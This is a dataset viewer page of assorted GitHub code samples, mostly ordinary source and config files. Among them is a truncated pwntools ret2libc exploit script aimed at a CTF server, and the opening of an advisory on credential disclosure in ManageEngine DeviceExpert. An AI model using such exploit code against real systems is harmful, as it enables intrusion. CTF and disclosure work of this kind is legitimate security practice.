text stringlengths 2 99.9k | meta dict |
|---|---|
bh_shr() {
[[ $# -lt 2 ]] && return 1
echo $(($1>>$2))
} | {
"pile_set_name": "Github"
} |
import * as React from 'react';
import * as SRD from '../../src/main';
export class DiamonNodeWidget extends React.Component {
static defaultProps = {
size:150,
node: null
};
render() {
return (
React.DOM.div({className: "diamond-node", style: {position: 'relative', width: this.props.size, he... | {
"pile_set_name": "Github"
} |
// This file is part of Eigen, a lightweight C++ template library
// for linear algebra.
//
// Copyright (C) 2008-2011 Gael Guennebaud <gael.guennebaud@inria.fr>
//
// This Source Code Form is subject to the terms of the Mozilla
// Public License v. 2.0. If a copy of the MPL was not distributed
// with this file, You c... | {
"pile_set_name": "Github"
} |
# MBE02_BLOCK_PARTIAL
This example is a simple block made of two parts that don't occupy the whole 1x1x1m space:
1. a "rectangular base" with the lapis lazuli texture
1. a "pole" with a stone texture
It will show you:
1. how to create a Block class for a block that isn't 1x1x1m, and register it
1. how to define and... | {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you ... | {
"pile_set_name": "Github"
} |
config BR2_PACKAGE_XINETD
bool "xinetd"
depends on BR2_USE_MMU # fork()
help
xinetd is a secure replacement for inetd. It was originally written by
panos@cs.colorado.edu.
http://www.xinetd.org
| {
"pile_set_name": "Github"
} |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# king_phisher/client/windows/compare_campaigns.py
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyri... | {
"pile_set_name": "Github"
} |
--TEST--
macro with a filter
--TEMPLATE--
{% import _self as test %}
{% macro test() %}
{% filter escape %}foo<br />{% endfilter %}
{% endmacro %}
{{ test.test() }}
--DATA--
return array();
--EXPECT--
foo<br />
| {
"pile_set_name": "Github"
} |
# The segment label assigned to this set of laser points, usually unique per sensor_msgs/Laserscan.
# If the LaserscanSegmentation message is used to annotate groundtruth person tracks, each label
# corresponds to the ID of a tracked person.
# Note that laser points which are considered as background are not part of an... | {
"pile_set_name": "Github"
} |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
# Author : yuan
# https://30cm.ml
host = "140.115.59.7"
port = 11004
yuan = remote(host , port)
#yuan = process('./ret2lib_easy')
#cmd = sys.argv[1] + '\0'
yuan.sendline("6295584")
readaddr = 0x7fb6d14ee7b0
libc_read_offset = 0x00000000000f69a0
libc... | {
"pile_set_name": "Github"
} |
// (C) Copyright Gennadiy Rozental 2001-2008.
// Distributed under the Boost Software License, Version 1.0.
// (See accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt)
// See http://www.boost.org/libs/test for the library home page.
//
// File : $RCSfile$
//
// Version ... | {
"pile_set_name": "Github"
} |
/*
* linux/fs/nls/nls_cp437.c
*
* Charset cp437 translation tables.
* Generated automatically from the Unicode and charset
* tables from the Unicode Organization (www.unicode.org).
* The Unicode to charset table has only exact mappings.
*/
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/stri... | {
"pile_set_name": "Github"
} |
E:\Learn\C#\code\DSAGL_EXP\exp6xapp\bin\Debug\exp6xapp.exe.config
E:\Learn\C#\code\DSAGL_EXP\exp6xapp\bin\Debug\exp6xapp.exe
E:\Learn\C#\code\DSAGL_EXP\exp6xapp\bin\Debug\exp6xapp.pdb
E:\Learn\C#\code\DSAGL_EXP\exp6xapp\bin\Debug\exp6lib.dll
E:\Learn\C#\code\DSAGL_EXP\exp6xapp\bin\Debug\exp6lib.pdb
E:\Learn\C#\cod... | {
"pile_set_name": "Github"
} |
// Copyright 2009 the Sputnik authors. All rights reserved.
/**
* Operator x++ returns ToNumber(x)
*
* @path ch11/11.3/11.3.1/S11.3.1_A4_T4.js
* @description Type(x) is undefined or null
*/
//CHECK#1
var x;
var y = x++;
if (isNaN(y) !== true) {
$ERROR('#1: var x; var y = x++; y === Not-a-Number. Actual: ' + (y... | {
"pile_set_name": "Github"
} |
{
"id": @integer@,
"position": 0,
"extra": "Some info"
}
| {
"pile_set_name": "Github"
} |
'use strict';
var env_1 = require('../../env');
var vueServer = require('vue-server');
var Vue = new vueServer.renderer();
Vue.config.debug = !(env_1.config.NODE_ENV == 'product');
Vue.config.silent = (env_1.config.NODE_ENV == 'product');
exports.__esModule = true;
exports["default"] = Vue;
//# sourceMappingURL=vueServ... | {
"pile_set_name": "Github"
} |
! RUN: %f18 -E %s 2>&1 | FileCheck %s
! CHECK: res=777
* KWM split across continuation, implicit padding
integer, parameter :: KWM = 666
#define KWM 777
integer :: res
res = KW
+M
if (res .eq. 777) then
print *, 'pp005.F yes'
else
print *, 'pp005.F no: ', res
end... | {
"pile_set_name": "Github"
} |
{"text": ["looking", "for", "the", "next", "$", "alk", "$", "pm", "$", "cie", "$", "yod", "i", "suggest", "URL"], "created_at": "Mon Apr 28 06:55:24 +0000 2014", "user_id_str": "2454743183"}
| {
"pile_set_name": "Github"
} |
.weui-uploader__hd {
display: -webkit-box;
display: -webkit-flex;
display: flex;
padding-bottom: 10px;
-webkit-box-align: center;
-webkit-align-items: center;
align-items: center;
}
.weui-uploader__title {
-webkit-box-flex: 1;
-webkit-flex: 1;
flex: 1;
}
.weui-uploader__info {
colo... | {
"pile_set_name": "Github"
} |
/*M///////////////////////////////////////////////////////////////////////////////////////
//
// IMPORTANT: READ BEFORE DOWNLOADING, COPYING, INSTALLING OR USING.
//
// By downloading, copying, installing or using the software you agree to this license.
// If you do not agree to this license, do not download, instal... | {
"pile_set_name": "Github"
} |
//
// Generated by class-dump 3.5 (64 bit) (Debug version compiled Oct 25 2017 03:49:04).
//
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2015 by Steve Nygard.
//
#import <iLifeKit/iLifeKit.h>
@class ArchiveController, BackgroundColorView, NSMutableArray, NSTextField, NSWindow;
@protocol EventInt... | {
"pile_set_name": "Github"
} |
export const SERVER = {
HOST: 'https://iot.diandeng.tech'
}
export const API = {
SHARE: SERVER.HOST + '/api/v1/user/device/share/device'
} | {
"pile_set_name": "Github"
} |
'use strict';
angular.module("ngLocale", [], ["$provide", function($provide) {
var PLURAL_CATEGORY = {ZERO: "zero", ONE: "one", TWO: "two", FEW: "few", MANY: "many", OTHER: "other"};
$provide.value("$locale", {
"DATETIME_FORMATS": {
"AMPMS": [
"a.m.",
"p.m."
],
"DAY": [
"D\u00e9 Domhnaig... | {
"pile_set_name": "Github"
} |
using System;
using System.Globalization;
using TodoLocalized.UWP;
using Xamarin.Forms;
[assembly: Dependency(typeof(Localize))]
namespace TodoLocalized.UWP
{
public class Localize : ILocale
{
public System.Globalization.CultureInfo GetCurrentCultureInfo()
{
return new System.Globa... | {
"pile_set_name": "Github"
} |
// cgo -godefs types_solaris.go | go run mkpost.go
// Code generated by the command above; see README.md. DO NOT EDIT.
// +build amd64,solaris
package unix
const (
SizeofPtr = 0x8
SizeofShort = 0x2
SizeofInt = 0x4
SizeofLong = 0x8
SizeofLongLong = 0x8
PathMax = 0x400
MaxHostNameLen = 0... | {
"pile_set_name": "Github"
} |
>> User credential disclosure in ManageEngine DeviceExpert 5.9
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
>> Background on the affected product:
"DeviceExpert is a web–based, multi vendor network change, ... | {
"pile_set_name": "Github"
} |
/*
* netlink-generic.h Local Generic Netlink Interface
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation version 2.1
* of the License.
*
* Copyright (c) 2003-2006 Thomas Graf <tgra... | {
"pile_set_name": "Github"
} |
# Copyright (C) 2001-2007, 2009-2011 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "... | {
"pile_set_name": "Github"
} |
package client
import (
"fmt"
"net/http/httptest"
"os"
"time"
"github.com/ajvb/kala/api"
"github.com/ajvb/kala/job"
"testing"
"github.com/gorilla/mux"
"github.com/stretchr/testify/assert"
)
func NewTestServer() *httptest.Server {
r := mux.NewRouter()
db := &job.MockDB{}
cache := job.NewLockFreeJobCache... | {
"pile_set_name": "Github"
} |
/*
* Copyright 2013 Red Hat Inc.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, d... | {
"pile_set_name": "Github"
} |
import 'package:flutter/cupertino.dart';
import 'package:flutter/material.dart';
void main() {
runApp(new IntegrationApp());
}
class IntegrationApp extends StatelessWidget {
@override
Widget build(BuildContext context) {
return new MaterialApp(
home: new MaterialPage(),
);
}
}
class MaterialP... | {
"pile_set_name": "Github"
} |
(module HVQFN-40-1EP_6x6mm_P0.5mm_EP4.1x4.1mm (layer F.Cu) (tedit 5ECF8386)
(descr "HVQFN, 40 Pin (https://www.nxp.com/docs/en/package-information/SOT618-1.pdf), generated with kicad-footprint-generator ipc_noLead_generator.py")
(tags "HVQFN NoLead")
(attr smd)
(fp_text reference REF** (at 0 -4.32) (layer F.Sil... | {
"pile_set_name": "Github"
} |
# Copyright 1999-2019 Gentoo Authors
# Distributed under the terms of the GNU General Public License v2
EAPI=6
CHROMIUM_LANGS="am ar bg bn ca cs da de el en-GB es es-419 et fa fi fil fr
gu he hi hr hu id it ja kn ko lt lv ml mr ms nb nl pl pt-BR pt-PT ro ru
sk sl sr sv sw ta te th tr uk vi zh-CN zh-TW"
inherit chro... | {
"pile_set_name": "Github"
} |
package widget;
import java.awt.Color;
import java.awt.EventQueue;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import javax.swing.JLabel;
import javax.swing.JPanel;
import javax.swing.JWindow;
import javax.swing.Timer;
public class RunText3 {
private JWindow window = new JWindow();
... | {
"pile_set_name": "Github"
} |
#ifndef __sigevent_t_defined
#define __sigevent_t_defined 1
#include <bits/wordsize.h>
#include <bits/types.h>
#include <bits/types/__sigval_t.h>
#define __SIGEV_MAX_SIZE 64
#if __WORDSIZE == 64
# define __SIGEV_PAD_SIZE ((__SIGEV_MAX_SIZE / sizeof (int)) - 4)
#else
# define __SIGEV_PAD_SIZE ((__SIGEV_MAX_SIZE / size... | {
"pile_set_name": "Github"
} |
/**
******************************************************************************
* @file stm32f4xx_cryp.c
* @author MCD Application Team
* @version V1.5.1
* @date 22-May-2015
* @brief This file provides firmware functions to manage the following
* functionalities of the Crypto... | {
"pile_set_name": "Github"
} |
<?php
// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle ... | {
"pile_set_name": "Github"
} |
# Generated by superflore -- DO NOT EDIT
#
# Copyright Open Source Robotics Foundation
inherit ros_distro_melodic
inherit ros_superflore_generated
DESCRIPTION = "Configuration and launch files for running ROS navigation on Fetch."
AUTHOR = "Russell Toris <rtoris@fetchrobotics.com>"
ROS_AUTHOR = "Michael Ferguson"
HOM... | {
"pile_set_name": "Github"
} |
// Copyright 2018 Frédéric Guillot. All rights reserved.
// Use of this source code is governed by the Apache 2.0
// license that can be found in the LICENSE file.
package locale // import "miniflux.app/locale"
import "testing"
func TestAvailableLanguages(t *testing.T) {
results := AvailableLanguages()
for k, v :=... | {
"pile_set_name": "Github"
} |
/* http://github.com/mindmup/bootstrap-wysiwyg */
/*global jQuery, $, FileReader*/
/*jslint browser:true*/
(function ($) {
'use strict';
var readFileIntoDataUrl = function (fileInfo) {
var loader = $.Deferred(),
fReader = new FileReader();
fReader.onload = function (e) {
loader.resolve(e.target.result);
}... | {
"pile_set_name": "Github"
} |
/*
Copyright (c) 2008-2018, Benoit AUTHEMAN All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions a... | {
"pile_set_name": "Github"
} |
/*
* Copyright (c) 2020, The SerenityOS developers.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* 1. Redistributions of source code must retain the above copyright notice, this
* ... | {
"pile_set_name": "Github"
} |
#include "stdio_impl.h"
#undef stderr
static unsigned char buf[UNGET];
hidden FILE __stderr_FILE = {
.buf = buf+UNGET,
.buf_size = 0,
.fd = 2,
.flags = F_PERM | F_NORD,
.lbf = -1,
.write = __stdio_write,
.seek = __stdio_seek,
.close = __stdio_close,
.lock = -1,
};
FILE *const stderr = &__stderr_FILE;
FILE *v... | {
"pile_set_name": "Github"
} |
<?xml version="1.0" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>OCSP_resp_find_status</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<link rev="made" href="mailto... | {
"pile_set_name": "Github"
} |
#!/usr/bin/env python
# coding: utf-8
#
# Author: Kazuto Nakashima
# URL: https://kazuto1011.github.io
# Date: 09 January 2019
import numpy as np
import pydensecrf.densecrf as dcrf
import pydensecrf.utils as utils
class DenseCRF(object):
def __init__(self, iter_max, pos_w, pos_xy_std, bi_w, bi_xy_std, bi_r... | {
"pile_set_name": "Github"
} |
{
"scope": "meta.main-key.sublime-project",
"completions": [
{
"trigger": "folders",
"details": "Folders section",
"kind": ["keyword", "k", "main"],
},
{
"trigger": "build_systems",
"details": "Build systems section",
... | {
"pile_set_name": "Github"
} |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("fluent_pages", "0001_initial")]
operations = [
migrations.CreateModel(
name="FluentPage",
fields=[
... | {
"pile_set_name": "Github"
} |
#include "StdAfx.h"
#include "UIFlash.h"
#include <atlcomcli.h>
#define DISPID_FLASHEVENT_FLASHCALL ( 0x00C5 )
#define DISPID_FLASHEVENT_FSCOMMAND ( 0x0096 )
#define DISPID_FLASHEVENT_ONPROGRESS ( 0x07A6 )
namespace DuiLib
{
IMPLEMENT_DUICONTROL(CFlashUI)
CFlashUI::CFlashUI(void)
: m_dwRef... | {
"pile_set_name": "Github"
} |
package
{
public dynamic class Dummy6
{
}
} | {
"pile_set_name": "Github"
} |
#!/usr/bin/env python
from generator.actions import Actions, Variable
import random
import string
import math
def random_string(length, population=string.letters+string.digits):
s = ''
for x in xrange(length):
s += random.choice(population)
return s
def root64len(mode, s):
if mode == 'decode':... | {
"pile_set_name": "Github"
} |
package solver
import (
"context"
"time"
digest "github.com/opencontainers/go-digest"
"github.com/pkg/errors"
)
var ErrNotFound = errors.Errorf("not found")
// CacheKeyStorage is interface for persisting cache metadata
type CacheKeyStorage interface {
Exists(id string) bool
Walk(fn func(id string) error) erro... | {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2005-2018 Team Kodi
* This file is part of Kodi - https://kodi.tv
*
* SPDX-License-Identifier: GPL-2.0-or-later
* See LICENSES/README.md for more information.
*/
#pragma once
#include "DirectoryNode.h"
namespace XFILE
{
namespace MUSICDATABASEDIRECTORY
{
class CDirectoryNodeAlbum... | {
"pile_set_name": "Github"
} |
(*
* Copyright (C) 2012 Citrix Ltd.
* Author Ian Campbell <ian.campbell@citrix.com>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU Lesser General Public License as published
* by the Free Software Foundation; version 2.1 only. with the special
* exce... | {
"pile_set_name": "Github"
} |
package slashingprotection
import (
"context"
"testing"
eth "github.com/prysmaticlabs/ethereumapis/eth/v1alpha1"
"github.com/prysmaticlabs/prysm/shared/bytesutil"
"github.com/prysmaticlabs/prysm/shared/testutil/assert"
mockSlasher "github.com/prysmaticlabs/prysm/validator/testing"
)
func TestService_VerifyAtte... | {
"pile_set_name": "Github"
} |
from future.utils import python_2_unicode_compatible
from viberbot.api.messages.typed_message import TypedMessage
from viberbot.api.messages.message_type import MessageType
class TextMessage(TypedMessage):
def __init__(self, tracking_data=None, keyboard=None, text=None, min_api_version=None):
super(TextMessage, se... | {
"pile_set_name": "Github"
} |
<div class="apiDetail">
<div>
<h2><span>JSON / Function(treeId, treeNode)</span><span class="path">setting.view.</span>fontCss</h2>
<h3>概述<span class="h3_info">[ 依赖 <span class="highlight_green">jquery.ztree.core</span> 核心 js ]</span></h3>
<div class="desc">
<p></p>
<div class="longdesc">
<p>个性化文字样式,只针对 zTree... | {
"pile_set_name": "Github"
} |
rule m2318_23394012d7d30b32
{
meta:
copyright="Copyright (c) 2014-2018 Support Intelligence Inc, All Rights Reserved."
engine="saphire/1.3.1 divinorum/0.998 icewater/0.4"
viz_url="http://icewater.io/en/cluster/query?h64=m2318.23394012d7d30b32"
cluster="m2318.23394012d7d30b32"
cluster_size=... | {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<!--
/**
* Copyright © Magento, Inc. All rights reserved.
* See COPYING.txt for license details.
*/
-->
<actionGroups xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="urn:magento:mftf:Test/etc/actionGroupSchema.xsd">
<a... | {
"pile_set_name": "Github"
} |
/// <reference types="node" />
import * as http from 'http';
import { AngularWaitBarrier } from './angular_wait_barrier';
import { HighlightDelayBarrier } from './highlight_delay_barrier';
import { WebDriverLogger } from './webdriver_logger';
export declare const BP_PREFIX = "bpproxy";
/**
* The stability proxy is an ... | {
"pile_set_name": "Github"
} |
/*
* Copyright (c) 2015, 2020 Oracle and/or its affiliates. All rights reserved.
*
* This program and the accompanying materials are made available under the
* terms of the Eclipse Public License v. 2.0 which is available at
* http://www.eclipse.org/legal/epl-2.0,
* or the Eclipse Distribution License v. 1.0 whic... | {
"pile_set_name": "Github"
} |
# Chapter 07: Hindley-Milner and Me
## What's Your Type?
If you're new to the functional world, it won't be long before you find yourself knee deep in type signatures. Types are the meta language that enables people from all different backgrounds to communicate succinctly and effectively. For the most part, they're wr... | {
"pile_set_name": "Github"
} |
<!DOCTYPE html>
<html>
<head>
<title>Tests for z-index</title>
<style type="text/css">
html {
margin: 0;
padding: 0;
}
body {
background: url(background2.gif);
padding: 20px 50% 20px 0;
}
.test {
behavior: ur... | {
"pile_set_name": "Github"
} |
package net.demilich.metastone.game.entities.minions;
import net.demilich.metastone.game.cards.Card;
import net.demilich.metastone.game.entities.Actor;
public abstract class Summon extends Actor {
public Summon(Card sourceCard) {
super(sourceCard);
}
@Override
public Summon clone() {
Summon clone = (Summon)... | {
"pile_set_name": "Github"
} |
--- a/arch/arm/mach-cns3xxx/pcie.c
+++ b/arch/arm/mach-cns3xxx/pcie.c
@@ -86,6 +86,79 @@ static void __iomem *cns3xxx_pci_map_bus
return base + (where & 0xffc) + (devfn << 12);
}
+static inline int check_master_abort(struct pci_bus *bus, unsigned int devfn, int where)
+{
+ struct cns3xxx_pcie *cnspci = pbus_to_cns... | {
"pile_set_name": "Github"
} |
namespace NexusForever.Shared.GameTable.Model
{
public class Spell4TargetAngleEntry
{
public uint Id;
public float TargetAngle;
}
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2009 Red Hat <mjg@redhat.com>
*
* Permission is hereby granted, free of charge, to any person obtaining
* a copy of this software and associated documentation files (the
* "Software"), to deal in the Software without restriction, including
* without limitation the rights to use, copy, modify, m... | {
"pile_set_name": "Github"
} |
//
// NYTPhotoTransitionAnimator.h
// NYTPhotoViewer
//
// Created by Brian Capps on 2/17/15.
//
//
@import UIKit;
NS_ASSUME_NONNULL_BEGIN
/**
* An object that controls the animated transition of photo presentation and dismissal.
*/
@interface NYTPhotoTransitionAnimator : NSObject <UIViewControllerAnimatedTran... | {
"pile_set_name": "Github"
} |
# -*- coding: utf-8 -*-
# Copyright (C) 2012-2015 Bastian Kleineidam
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#... | {
"pile_set_name": "Github"
} |
---
external help file: Microsoft.Rtc.Management.dll-help.xml
online version: https://docs.microsoft.com/powershell/module/skype/set-csanalogdevice
applicable: Lync Server 2010, Lync Server 2013, Skype for Business Server 2015, Skype for Business Server 2019
title: Set-CsAnalogDevice
schema: 2.0.0
manager: rogupta
auth... | {
"pile_set_name": "Github"
} |
cheats = 15
cheat0_desc = "Timer Codes"
cheat1_desc = "Reset Timer"
cheat1_code = "94000130+FEFF0000+62075538+00000000+B2075538+00000000+B00000A0+00000000+00000080+00000000+D2000000+00000000"
cheat1_enable = false
cheat2_desc = "Lots of Time"
cheat2_code = "94000130+FDFF0000+62075538+00000000+B2075538+00000000+B0000... | {
"pile_set_name": "Github"
} |
/**
* This file is part of Aion-Lightning <aion-lightning.org>.
*
* Aion-Lightning is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any lat... | {
"pile_set_name": "Github"
} |
#include "UnityTrampolineCompatibility.h"
#include "UnityRendering.h"
#if UNITY_CAN_USE_METAL
#include "UnityMetalSupport.h"
#include <QuartzCore/QuartzCore.h>
#include <libkern/OSAtomic.h>
#if UNITY_TRAMPOLINE_IN_USE
#include "UnityAppController.h"
#include "CVTextureCache.h"
#endif
#include "ObjCRuntime.h"
extern... | {
"pile_set_name": "Github"
} |
27
0 16
1 23
1 18
2 13
2 19
2 14
3 10
3 16
4 17
5 15
5 11
5 16
6 19
6 7
7 22
7 10
7 17
8 21
9 24
10 25
10 13
12 14
13 26
13 24
14 21
15 18
15 19
18 20
18 25
19 23
| {
"pile_set_name": "Github"
} |
/*
* Copyright (c) 2013-2015, Mellanox Technologies. All rights reserved.
*
* This software is available to you under a choice of one of two
* licenses. You may choose to be licensed under the terms of the GNU
* General Public License (GPL) Version 2, available from the file
* COPYING in the main directory of th... | {
"pile_set_name": "Github"
} |
fileFormatVersion: 2
guid: f36c148914c8e05498dad1ca7becaa2e
timeCreated: 1474819278
licenseType: Store
ModelImporter:
serializedVersion: 18
fileIDToRecycleName:
100000: //RootNode
100002: default
100004: RoundedCube
400000: //RootNode
400002: default
400004: RoundedCube
2300000: default
... | {
"pile_set_name": "Github"
} |
return require 'map_gen.maps.default'
--[[
Replace the word default in the quotes above with the name of the map you want to play then save this file.
Example: If you want to play beach, line 1 should look like:
return require 'map_gen.maps.beach'
If default is left in place, you will get a vanilla worl... | {
"pile_set_name": "Github"
} |
//
// RDPackageResourceConnection.h
// RDServices
//
// Created by Shane Meyer on 11/23/13.
// Copyright (c) 2014 Readium Foundation and/or its licensees. All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification,
// are permitted provided that the following con... | {
"pile_set_name": "Github"
} |
import {IKey} from "../../API";
/**
* Interface that describes the raw image user properties.
*
* @interface IUser
*/
export interface IUser extends IKey {
/**
* The username of the user.
*/
username: string;
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<plugin game="Halo4" baseSize="0x70">
<!-- Automatically generated plugin -->
<revisions>
<revision author="Assembly" version="1">Generated plugin from scratch.</revision>
</revisions>
<undefined name="Unknown" offset="0x0" visible="false" />
<undefined name="Unknown" offs... | {
"pile_set_name": "Github"
} |
// Copyright Aleksey Gurtovoy 2000-2004
//
// Distributed under the Boost Software License, Version 1.0.
// (See accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt)
//
// Preprocessed version of "boost/mpl/apply_fwd.hpp" header
// -- DO NOT modify by hand!
namespace boo... | {
"pile_set_name": "Github"
} |
{
"name": "download-media-file",
"version": "1.0.0",
"description": "Adds a button to media modal to download media file.",
"main": "index.js",
"scripts": {
"test": "echo \"Error: no test specified\" && exit 1"
},
"repository": {
"type": "git",
"url": "git+https://github.com/shamimmoeen/downlo... | {
"pile_set_name": "Github"
} |
var baseFill = require('./_baseFill'),
isIterateeCall = require('./_isIterateeCall');
/**
* Fills elements of `array` with `value` from `start` up to, but not
* including, `end`.
*
* **Note:** This method mutates `array`.
*
* @static
* @memberOf _
* @since 3.2.0
* @category Array
* @param {Array} array T... | {
"pile_set_name": "Github"
} |
import { IconDefinition } from '../types';
declare const StepBackwardFilled: IconDefinition;
export default StepBackwardFilled;
| {
"pile_set_name": "Github"
} |
/*
The MIT License (MIT)
Copyright (c) 2015 Shun Takebayashi
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modif... | {
"pile_set_name": "Github"
} |
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Stores</title>
<link rel="stylesheet" type="text/css" href="../../resources/css/ext-all.css"/>
<!-- GC -->
<script type="text/javascrip... | {
"pile_set_name": "Github"
} |
// Copyright 2011 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package norm
import "io"
type normWriter struct {
rb reorderBuffer
w io.Writer
buf []byte
}
// Write implements the standard write interface. If the l... | {
"pile_set_name": "Github"
} |
/*!
* jQuery UI CSS Framework 1.8.20
*
* Copyright 2012, AUTHORS.txt (http://jqueryui.com/about)
* Licensed under the MIT license.
* http://jquery.org/license
*
* http://docs.jquery.com/UI/Theming
*/
@import "jquery.ui.base.css";
@import "jquery.ui.theme.css";
| {
"pile_set_name": "Github"
} |
<!--
This file is part of LibrePlan
Copyright (C) 2009-2010 Fundación para o Fomento da Calidade Industrial e
Desenvolvemento Tecnolóxico de Galicia
Copyright (C) 2010-2011 Igalia, S.L.
This program is free software: you can redistribute it and/or modify
it under the terms of the G... | {
"pile_set_name": "Github"
} |
agents:
- goal: [7, 2]
name: agent0
start: [3, 0]
- goal: [6, 3]
name: agent1
start: [5, 2]
- goal: [1, 4]
name: agent2
start: [1, 3]
- goal: [3, 6]
name: agent3
start: [4, 6]
- goal: [2, 5]
name: agent4
start: [3, 5]
- goal: [4, 5]
name: agent5
start: [4, 5]
... | {
"pile_set_name": "Github"
} |
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
package="com.winsontan520.wversionmanager.library"
android:versionCode="3"
android:versionName="1.3" >
<uses-sdk
android:minSdkVersion="8"
android:targetSdkVersion="17" />
<application
android:allowBackup=... | {
"pile_set_name": "Github"
} |
Writing custom Validators
=========================
File validations in the OneupUploaderBundle were made using the [EventDispatcher](http://symfony.com/doc/current/components/event_dispatcher/introduction.html) component.
If you want to enhance file validations in your application, you can register your own `EventLis... | {
"pile_set_name": "Github"
} |
#Mon Dec 28 10:00:20 PST 2015
distributionBase=GRADLE_USER_HOME
distributionPath=wrapper/dists
zipStoreBase=GRADLE_USER_HOME
zipStorePath=wrapper/dists
distributionUrl=https\://services.gradle.org/distributions/gradle-2.10-all.zip
| {
"pile_set_name": "Github"
} |
var Symbol;
if (!Symbol) {
Symbol = (function(Object){
// (C) WebReflection Mit Style License
var ObjectPrototype = Object.prototype,
defineProperty = Object.defineProperty,
prefix = '__simbol' + Math.random() + '__',
id = 0;
function get(){/*avoid set w/out get prob*/}
fun... | {
"pile_set_name": "Github"
} |
#!/usr/bin/env python
# encoding: utf-8
# Thomas Nagy, 2006-2018 (ita)
"Base for c programs/libraries"
from waflib import TaskGen, Task
from waflib.Tools import c_preproc
from waflib.Tools.ccroot import link_task, stlink_task
@TaskGen.extension('.c')
def c_hook(self, node):
"Binds the c file extensions create :py:c... | {
"pile_set_name": "Github"
} |
{
"images" : [
{
"idiom" : "universal",
"filename" : "mouth-circle.pdf"
}
],
"info" : {
"version" : 1,
"author" : "xcode"
},
"properties" : {
"preserves-vector-representation" : true
}
} | {
"pile_set_name": "Github"
} |
<?php
namespace PragmaRX\Tracker\Data\Repositories;
class Agent extends Repository
{
}
| {
"pile_set_name": "Github"
} |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" con... | {
"pile_set_name": "Github"
} |
/*****
dijit.form.Button
dijit.form.DropDownButton
dijit.form.ComboButton
dijit.form.ComboBox (partial)
dijit.form.Spinner (partial) (TODO: create NumberSpinner.css file like claro has)
*****/
.tundra .dijitButtonNode {
/* enabled state - inner */
border: 1px solid #c0c0c0;
border-bottom: 1px solid #9b9... | {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<!--
/**
* Copyright © Magento, Inc. All rights reserved.
* See COPYING.txt for license details.
*/
-->
<sections xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="urn:magento:mftf:Page/etc/SectionObject.xsd">
<section name="L... | {
"pile_set_name": "Github"
} |
/*
* Copyright (c) 2013-2017 Isode Limited.
* All rights reserved.
* See the COPYING file for more information.
*/
#pragma once
#include <memory>
#include <Swiften/Base/API.h>
#include <Swiften/Elements/PubSubOwnerSubscription.h>
#include <Swiften/Serializer/GenericPayloadSerializer.h>
namespace Swift {
cla... | {
"pile_set_name": "Github"
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.